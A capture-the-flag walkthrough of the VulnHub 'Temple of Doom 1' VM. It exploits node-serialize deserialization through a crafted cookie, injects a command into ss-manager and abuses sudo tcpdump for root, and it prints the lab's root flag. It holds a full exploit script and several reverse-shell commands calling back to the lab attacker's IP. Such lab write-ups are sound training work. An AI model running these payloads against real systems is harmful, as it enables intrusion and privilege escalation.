Temple of Doom 1
Target information
Author: jason_huawen
Name: Temple of Doom: 1
URL:
https://www.vulnhub.com/entry/temple-of-doom-1,243/
Identifying the target's IP address
┌──(kali㉿kali)-[~/Vulnhub/Temple]
└─$ sudo netdiscover -i eth1
Currently scanning: 172.26.218.0/16 | Screen View: Unique Hosts
4 Captured ARP Req/Rep packets, from 3 hosts. Total size: 240
_____________________________________________________________________________
IP At MAC Address Count Len MAC Vendor / Hostname
-----------------------------------------------------------------------------
192.168.56.1 0a:00:27:00:00:0a 1 60 Unknown vendor
192.168.56.100 08:00:27:3e:7d:ac 2 120 PCS Systemtechnik GmbH
192.168.56.228 08:00:27:66:97:ec 1 60 PCS Systemtechnik GmbH
Using netdiscover, which ships with Kali Linux, the target's IP address is identified as 192.168.56.228.
Nmap scan
┌──(kali㉿kali)-[~/Vulnhub/Temple]
└─$ sudo nmap -sS -sV -sC -p- 192.168.56.228 -oN nmap_full_scan
Starting Nmap 7.92 ( https://nmap.org ) at 2022-12-11 08:46 EST
Nmap scan report for bogon (192.168.56.228)
Host is up (0.000066s latency).
Not shown: 65533 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.7 (protocol 2.0)
| ssh-hostkey:
| 2048 95:68:04:c7:42:03:04:cd:00:4e:36:7e:cd:4f:66:ea (RSA)
| 256 c3:06:5f:7f:17:b6:cb:bc:79:6b:46:46:cc:11:3a:7d (ECDSA)
|_ 256 63:0c:28:88:25:d5:48:19:82:bb:bd:72:c6:6c:68:50 (ED25519)
666/tcp open http Node.js Express framework
|_http-title: Site doesn't have a title (text/html; charset=utf-8).
MAC Address: 08:00:27:66:97:EC (Oracle VirtualBox virtual NIC)
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 14.10 seconds
The Nmap results show two open ports on the target: SSH on 22 and a Node.js Express application on 666.
Getting a shell
┌──(kali㉿kali)-[~/Vulnhub/Temple]
└─$ curl http://192.168.56.228:666/
Under Construction, Come Back Later!
┌──(kali㉿kali)-[~/Vulnhub/Temple]
└─$ curl http://192.168.56.228:666/robots.txt
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="utf-8">
<title>Error</title>
</head>
<body>
<pre>Cannot GET /robots.txt</pre>
</body>
</html>
┌──(kali㉿kali)-[~/Vulnhub/Temple]
└─$ gobuster dir -u http://192.168.56.228:666 -w /usr/share/wordlists/dirbuster/directory-list-1.0.txt
===============================================================
Gobuster v3.3
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.56.228:666
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-1.0.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.3
[+] Timeout: 10s
===============================================================
2022/12/11 08:58:08 Starting gobuster in directory enumeration mode
===============================================================
Progress: 139440 / 141709 (98.40%)
===============================================================
2022/12/11 08:58:27 Finished
===============================================================
Directory brute-forcing with Gobuster turned up nothing. Intercepting the traffic with Burp Suite and requesting http://192.168.56.228:666 again, the response this time was a stack trace instead of the placeholder page:
SyntaxError: Unexpected token F in JSON at position 79
at JSON.parse (<anonymous>)
at Object.exports.unserialize (/home/nodeadmin/.web/node_modules/node-serialize/lib/serialize.js:62:16)
at /home/nodeadmin/.web/server.js:12:29
at Layer.handle [as handle_request] (/home/nodeadmin/.web/node_modules/express/lib/router/layer.js:95:5)
at next (/home/nodeadmin/.web/node_modules/express/lib/router/route.js:137:13)
at Route.dispatch (/home/nodeadmin/.web/node_modules/express/lib/router/route.js:112:3)
at Layer.handle [as handle_request] (/home/nodeadmin/.web/node_modules/express/lib/router/layer.js:95:5)
at /home/nodeadmin/.web/node_modules/express/lib/router/index.js:281:22
at Function.process_params (/home/nodeadmin/.web/node_modules/express/lib/router/index.js:335:12)
at next (/home/nodeadmin/.web/node_modules/express/lib/router/index.js:275:10)
The browser's developer tools show why: the first response set a `profile` cookie, which the browser sent back on the next request:
profile=eyJ1c2VybmFtZSI6IkFkbWluIiwiY3NyZnRva2VuIjoidTMydDRvM3RiM2dnNDMxZnMzNGdnZGdjaGp3bnphMGw9IiwiRXhwaXJlcz0iOkZyaWRheSwgMTMgT2N0IDIwMTggMDA6MDA6MDAgR01UIn0%3D
URL-decode the profile value, then base64-decode it (CyberChef works well for this). The result:
{"username":"Admin","csrftoken":"u32t4o3tb3gg431fs34ggdgchjwnza0l=","Expires=":Friday, 13 Oct 2018 00:00:00 GMT"}
Looking closely at the decoded string, the Expires member is malformed: the key is `Expires=` and the value `Friday, ...` lacks its opening quote, which is exactly why JSON.parse fails at position 79 (the `F`). Correct it to `"Expires":"Friday, ..."`, re-encode (base64, then URL-encode), replace the profile cookie value and reload the page.
Corrected JSON and its encoding:
{"username":"Admin","csrftoken":"u32t4o3tb3gg431fs34ggdgchjwnza0l=","Expires":"Friday, 13 Oct 2018 00:00:00 GMT"}
eyJ1c2VybmFtZSI6IkFkbWluIiwiY3NyZnRva2VuIjoidTMydDRvM3RiM2dnNDMxZnMzNGdnZGdjaGp3bnphMGw9IiwiRXhwaXJlcyI6IkZyaWRheSwgMTMgT2N0IDIwMTggMDA6MDA6MDAgR01UIn0=
After reloading, the page now shows "hello Admin".
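The decode, repair and re-encode round trip above, as an added Node.js example (not part of the original write-up). It works on the cookie value captured above and additionally checks that the character at offset 79 of the decoded text is the unquoted `F` the server's `Unexpected token F in JSON at position 79` error pointed at:

```javascript
// Added example, not part of the original write-up: decode, check and repair
// the profile cookie the Express app set, then re-encode it for the browser.

// Cookie value as captured in the browser's developer tools (URL-encoded base64).
const RAW_COOKIE =
  'eyJ1c2VybmFtZSI6IkFkbWluIiwiY3NyZnRva2VuIjoidTMydDRvM3RiM2dnNDMxZnMzNGdnZGdjaGp3bnphMGw9IiwiRXhwaXJlcz0iOkZyaWRheSwgMTMgT2N0IDIwMTggMDA6MDA6MDAgR01UIn0%3D';

// URL-decode, then base64-decode, giving the JSON text the server tries to parse.
function decodeProfile(cookieValue) {
  return Buffer.from(decodeURIComponent(cookieValue), 'base64').toString('utf8');
}

// Returns the JSON.parse error (or null when the text is valid JSON) so the
// caller can see exactly what the server's unserialize() choked on.
function jsonParseError(text) {
  try {
    JSON.parse(text);
    return null;
  } catch (err) {
    return err;
  }
}

// The single malformed member is `"Expires=":Friday, ... GMT"`: the key carries a
// stray `=` and the value has no opening quote. Rewrite it as `"Expires":"..."`.
function repairProfile(text) {
  return text.replace(/"Expires=":([^"]*)"/, '"Expires":"$1"');
}

// Reverse of decodeProfile: base64, then URL-encode (turns the padding `=` into %3D).
function encodeProfile(text) {
  return encodeURIComponent(Buffer.from(text, 'utf8').toString('base64'));
}

// Offset quoted in the server's error message; the character there is the
// unquoted F of "Friday".
function charAtErrorOffset(text, offset = 79) {
  return text.charAt(offset);
}

if (typeof require !== 'undefined' && require.main === module) {
  const decoded = decodeProfile(RAW_COOKIE);
  console.log('decoded :', decoded);
  console.log('error   :', jsonParseError(decoded).message);
  console.log('char 79 :', charAtErrorOffset(decoded));
  const fixed = repairProfile(decoded);
  console.log('repaired:', fixed);
  console.log('cookie  :', encodeProfile(fixed));
}
```

Run it with `node cookie.js`; the last line printed is the value to paste into the profile cookie. The error offset check is worth keeping in any similar engagement: it confirms that the stack trace was produced by your own cookie and not by some unrelated request.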
The stack trace names the library that parses the cookie: `node-serialize` (`/home/nodeadmin/.web/node_modules/node-serialize/lib/serialize.js`). Its `unserialize()` is affected by CVE-2017-5941: any string value prefixed with `_$$ND_FUNC$$_` is passed to `eval()` during deserialization, so a crafted profile cookie gives remote code execution. A public exploit is available at:
https://www.exploit-db.com/exploits/49552
┌──(kali㉿kali)-[~/Vulnhub/Temple]
└─$ mv ~/Downloads/49552.py .
┌──(kali㉿kali)-[~/Vulnhub/Temple]
└─$ mv 49552.py exploit.py
┌──(kali㉿kali)-[~/Vulnhub/Temple]
└─$ ls
exploit.py nmap_full_scan
┌──(kali㉿kali)-[~/Vulnhub/Temple]
└─$
┌──(kali㉿kali)-[~/Vulnhub/Temple]
└─$ cat exploit.py
# Exploit Title: Node.JS - 'node-serialize' Remote Code Execution (2)
# Exploit Author: UndeadLarva
# Software Link: https://www.npmjs.com/package/node-serialize
# Version: 0.0.4
# CVE: CVE-2017-5941
# Note: the published script is Python 2; the bytes/str handling and print()
# below make it run under Python 3 without changing what is sent.
import requests
import re
import base64
import sys

url = 'http://192.168.56.228:666/'  # change this

# JavaScript that node-serialize's unserialize() will eval(): it replaces
# ServerResponse.prototype.end with a function that strips the socket's
# listeners and spawns a reverse shell instead of finishing the response.
payload = ("require('http').ServerResponse.prototype.end = (function (end) {"
           "return function () {"
           "['close', 'connect', 'data', 'drain', 'end', 'error', 'lookup', 'timeout', ''].forEach(this.socket.removeAllListeners.bind(this.socket));"
           "console.log('still inside');"
           "const { exec } = require('child_process');"
           "exec('bash -i >& /dev/tcp/192.168.56.206/445 0>&1');"  # change this
           "}"
           "})(require('http').ServerResponse.prototype.end)")

# rce = "_$$ND_FUNC$$_process.exit(0)"
# code ="_$$ND_FUNC$$_console.log('behind you')"
# The _$$ND_FUNC$$_ prefix is what makes node-serialize eval() the value.
code = "_$$ND_FUNC$$_" + payload

# The repaired profile JSON from the previous step, with an extra "exec" key
# carrying the payload.
string = '{"username":"Admin","csrftoken":"u32t4o3tb3gg431fs34ggdgchjwnza0l=","Expires":"Friday, 13 Oct 2018 00:00:00 GMT", "exec": "'+code+'"}'
cookie = {'profile': base64.b64encode(string.encode()).decode()}

try:
    response = requests.get(url, cookies=cookie).text
    print(response)
except requests.exceptions.RequestException as e:
    print('Oops!')
    sys.exit(1)
The downloaded exploit needs more than the two `change this` edits: the `string` variable must be replaced with the repaired profile JSON from the previous step (the one that produced "hello Admin"), with an extra `exec` key carrying the payload. The listing above already reflects that change.
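An added example, not the VM's server.js and not the node-serialize package itself: it re-implements the unserialize() logic behind CVE-2017-5941 from its public description (JSON.parse, then eval() of every string that starts with `_$$ND_FUNC$$_`), shows how the cookie built by exploit.py is executed during deserialization, and contrasts it with a parser that reads the same profile without any eval. The expression used is a constructed, harmless stand-in for the exploit's `exec('bash -i ...')`:

```javascript
// Added example, not code from the target or from node-serialize. The reviver
// logic mirrors what node-serialize 0.0.4's unserialize() does: JSON.parse the
// input, then eval() any string value that starts with the function marker.
const FUNCFLAG = '_$$ND_FUNC$$_';

// Vulnerable: attacker-controlled strings reach eval() before the application
// ever looks at the parsed object.
function vulnerableUnserialize(json) {
  const obj = JSON.parse(json);
  for (const key of Object.keys(obj)) {
    const value = obj[key];
    if (typeof value === 'string' && value.indexOf(FUNCFLAG) === 0) {
      obj[key] = eval('(' + value.substring(FUNCFLAG.length) + ')');
    }
  }
  return obj;
}

// Safe replacement: plain JSON with an explicit field list; unexpected keys
// such as "exec" are dropped and nothing is ever evaluated.
const PROFILE_FIELDS = ['username', 'csrftoken', 'Expires'];
function safeParseProfile(json) {
  const obj = JSON.parse(json);
  const profile = {};
  for (const field of PROFILE_FIELDS) {
    if (typeof obj[field] !== 'string') {
      throw new Error('profile cookie: missing or non-string field ' + field);
    }
    profile[field] = obj[field];
  }
  return profile;
}

// Build the cookie the way exploit.py does: the repaired profile plus an
// "exec" key whose value is the marker followed by an arbitrary JS expression.
function buildProfileCookie(expression) {
  const profile = {
    username: 'Admin',
    csrftoken: 'u32t4o3tb3gg431fs34ggdgchjwnza0l=',
    Expires: 'Friday, 13 Oct 2018 00:00:00 GMT',
    exec: FUNCFLAG + expression,
  };
  return Buffer.from(JSON.stringify(profile), 'utf8').toString('base64');
}

// Decode the cookie as the server would and hand it to a parser. Returns
// whether the embedded expression executed and what ended up in "exec".
function simulateRequest(cookie, parser) {
  globalThis.__ndDemoRan = false;
  const json = Buffer.from(cookie, 'base64').toString('utf8');
  const profile = parser(json);
  return { ran: globalThis.__ndDemoRan === true, exec: profile.exec };
}

// Constructed, harmless stand-in for the exploit's exec('bash -i ...'): an
// IIFE that only flips a flag, proving it ran during deserialization.
const DEMO_EXPRESSION =
  "(function () { globalThis.__ndDemoRan = true; return 'ran'; })()";
const DEMO_COOKIE = buildProfileCookie(DEMO_EXPRESSION);

if (typeof require !== 'undefined' && require.main === module) {
  console.log('node-serialize style:', simulateRequest(DEMO_COOKIE, vulnerableUnserialize));
  console.log('plain JSON.parse    :', simulateRequest(DEMO_COOKIE, safeParseProfile));
}
```

The first call reports `ran: true` and `exec: 'ran'`: the expression executed before the application saw the object, and the cookie never had to contain a function at all, which is why the real payload can be a bare assignment expression. The second call reports `ran: false` with no `exec` field. The fix is not a better blacklist on the marker but removing the eval code path entirely and treating the cookie as data with a fixed schema.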
Kali received the shell:
┌──(kali㉿kali)-[~/Vulnhub/Temple]
└─$ sudo nc -nlvp 445
[sudo] password for kali:
listening on [any] 445 ...
connect to [192.168.56.206] from (UNKNOWN) [192.168.56.228] 37182
bash: cannot set terminal process group (844): Inappropriate ioctl for device
bash: no job control in this shell
[nodeadmin@localhost ~]$ id
id
uid=1001(nodeadmin) gid=1001(nodeadmin) groups=1001(nodeadmin)
[nodeadmin@localhost ~]$ cd /tmp
cd /tmp
Privilege escalation
Upload linpeas.sh to /tmp on the target, make it executable and run it.
Among the running processes in its output, one stands out:
root 838 0.0 0.1 301464 4524 ? S 08:15 0:00 su fireman -c /usr/local/bin/ss-manager
ss-manager (the shadowsocks-libev manager daemon) has a known command-injection vulnerability in the `method` field of its `add:` control command, described at:
https://www.exploit-db.com/exploits/43006
Because the process is started with `su fireman -c`, the injected command runs as fireman, so this step escalates to another user rather than to root. On Kali, start a listener:
┌──(kali㉿kali)-[~/Vulnhub/Temple]
└─$ sudo nc -nlvp 3333
[sudo] password for kali:
listening on [any] 3333 ...
In the reverse shell on the target, connect to the manager's UDP control port:
[nodeadmin@localhost home]$ nc -u 127.0.0.1 8839
then send the add command with the injection in the method field:
add: {"server_port":8003, "password":"test", "method":"||nc 192.168.56.206 3333 -e /bin/bash||"}
A second shell arrives on Kali, this time as fireman:
┌──(kali㉿kali)-[~/Vulnhub/Temple]
└─$ sudo nc -nlvp 3333
[sudo] password for kali:
listening on [any] 3333 ...
connect to [192.168.56.206] from (UNKNOWN) [192.168.56.228] 45432
id
uid=1002(fireman) gid=1002(fireman) groups=1002(fireman)
which python
/usr/bin/python
python -c 'import pty;pty.spawn("/bin/bash")'
[fireman@localhost root]$
[fireman@localhost root]$ sudo -l
sudo -l
Matching Defaults entries for fireman on localhost:
!visiblepw, env_reset, env_keep="COLORS DISPLAY HOSTNAME HISTSIZE KDEDIR
LS_COLORS", env_keep+="MAIL PS1 PS2 QTDIR USERNAME LANG LC_ADDRESS
LC_CTYPE", env_keep+="LC_COLLATE LC_IDENTIFICATION LC_MEASUREMENT
LC_MESSAGES", env_keep+="LC_MONETARY LC_NAME LC_NUMERIC LC_PAPER
LC_TELEPHONE", env_keep+="LC_TIME LC_ALL LANGUAGE LINGUAS _XKB_CHARSET
XAUTHORITY",
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User fireman may run the following commands on localhost:
(ALL) NOPASSWD: /sbin/iptables
(ALL) NOPASSWD: /usr/bin/nmcli
(ALL) NOPASSWD: /usr/sbin/tcpdump
[fireman@localhost root]$
tcpdump is the one to abuse: follow the sudo entry for tcpdump on GTFOBins, replacing the `id` in its example with a reverse shell command. Two flags matter: `-z` runs the given script on every capture-file rotation, and `-Z root` tells tcpdump not to drop privileges, so the script runs as root.
[fireman@localhost root]$ COMMAND='/bin/bash -i >& /dev/tcp/192.168.56.206/8888 0>&1'
<'/bin/bash -i >& /dev/tcp/192.168.56.206/8888 0>&1'
[fireman@localhost root]$ TF=$(mktemp)
TF=$(mktemp)
[fireman@localhost root]$ echo "$COMMAND" > $TF
echo "$COMMAND" > $TF
[fireman@localhost root]$ chmod +x $TF
chmod +x $TF
[fireman@localhost root]$ sudo tcpdump -ln -i lo -w /dev/null -W 1 -G 1 -z $TF -Z root
<ump -ln -i lo -w /dev/null -W 1 -G 1 -z $TF -Z root
tcpdump: listening on lo, link-type EN10MB (Ethernet), capture size 262144 bytes
^C
After entering the command tcpdump just sits there: with `-G 1` the rotation (and therefore the `-z` script) is only triggered when a packet arrives, and the loopback interface is idle. Press Ctrl+C to interrupt it; the root reverse shell then arrives. Generating a little loopback traffic from the other shell (for example `ping -c 2 127.0.0.1`) would also trigger the rotation.
┌──(kali㉿kali)-[~/Vulnhub/Temple]
└─$ sudo nc -nlvp 8888
[sudo] password for kali:
listening on [any] 8888 ...
connect to [192.168.56.206] from (UNKNOWN) [192.168.56.228] 40482
bash: cannot set terminal process group (20398): Inappropriate ioctl for device
bash: no job control in this shell
[root@localhost ~]# id
id
uid=0(root) gid=0(root) groups=0(root)
[root@localhost ~]# cd /root
cd /root
[root@localhost ~]# ls -alh
ls -alh
total 84K
dr-xr-x---. 10 root root 4.0K Jun 7 2018 .
dr-xr-xr-x. 18 root root 4.0K May 30 2018 ..
-rw------- 1 root root 130 Jun 7 2018 .bash_history
-rw-r--r--. 1 root root 18 Feb 9 2018 .bash_logout
-rw-r--r--. 1 root root 176 Feb 9 2018 .bash_profile
-rw-r--r--. 1 root root 176 Feb 9 2018 .bashrc
drwx------. 3 root root 4.0K Jun 1 2018 .cache
drwxrwx---. 4 root root 4.0K May 30 2018 .config
-rw-r--r--. 1 root root 100 Feb 9 2018 .cshrc
drwx------. 3 root root 4.0K May 30 2018 .dbus
-rw-------. 1 root root 16 May 30 2018 .esd_auth
-rw-r--r-- 1 root root 2.0K Jun 7 2018 flag.txt
-rw-r--r-- 1 root root 12K Jun 3 2018 .flag.txt.swp
drwxr-xr-x 4 root root 4.0K Jun 3 2018 .forever
-rw------- 1 root root 1.4K Jun 2 2018 .mysql_history
drwxr-xr-x. 5 1000 1000 4.0K May 30 2018 .npm
drwxr-----. 3 root root 4.0K May 30 2018 .pki
drwxr-xr-x 2 root root 4.0K Jun 1 2018 .ssocks
drwx------ 2 root root 4.0K Jun 7 2018 .ssh
-rw-------. 1 root root 0 May 30 2018 .Xauthority
[root@localhost ~]# cat flag.txt
cat flag.txt
[+] You're a soldier.
[+] One of the best that the world could set against
[+] the demonic invasion.
+-----------------------------------------------------------------------------+
| | |\ -~ / \ / |
|~~__ | \ | \/ /\ /|
| -- | \ | / \ / \ / |
| |~_| \ \___|/ \/ / |
|--__ | -- |\________________________________/~~\~~| / \ / \ |
| |~~--__ |~_|____|____|____|____|____|____|/ / \/|\ / \/ \/|
| | |~--_|__|____|____|____|____|____|_/ /| |/ \ / \ / |
|___|______|__|_||____|____|____|____|____|__[]/_|----| \/ \ / |
| \mmmm : | _|___|____|____|____|____|____|___| /\| / \ / \ |
| B :_--~~ |_|____|____|____|____|____|____| | |\/ \ / \ |
| __--P : | / / / | \ / \ /\|
|~~ | : | / ~~~ | \ / \ / |
| | |/ .-. | /\ \ / |
| | / | | |/ \ /\ |
| | / | | -_ \ / \ |
+-----------------------------------------------------------------------------+
| | /| | | 2 3 4 | /~~~~~\ | /| |_| .... ......... |
| | ~|~ | % | | | ~J~ | | ~|~ % |_| .... ......... |
| AMMO | HEALTH | 5 6 7 | \===/ | ARMOR |#| .... ......... |
+-----------------------------------------------------------------------------+
FLAG: kre0cu4jl4rzjicpo1i7z5l1
[+] Congratulations on completing this VM & I hope you enjoyed my first boot2root.
[+] You can follow me on twitter: @0katz
[+] Thanks to the homie: @Pink_P4nther
[root@localhost ~]#
The root flag is captured.
Lessons learned
- Read exploit code carefully: the modification hints it ships with may not be enough to make it work. The node-serialize deserialization exploit used here also had to be adapted to the application's own cookie structure, not just the `change this` markers.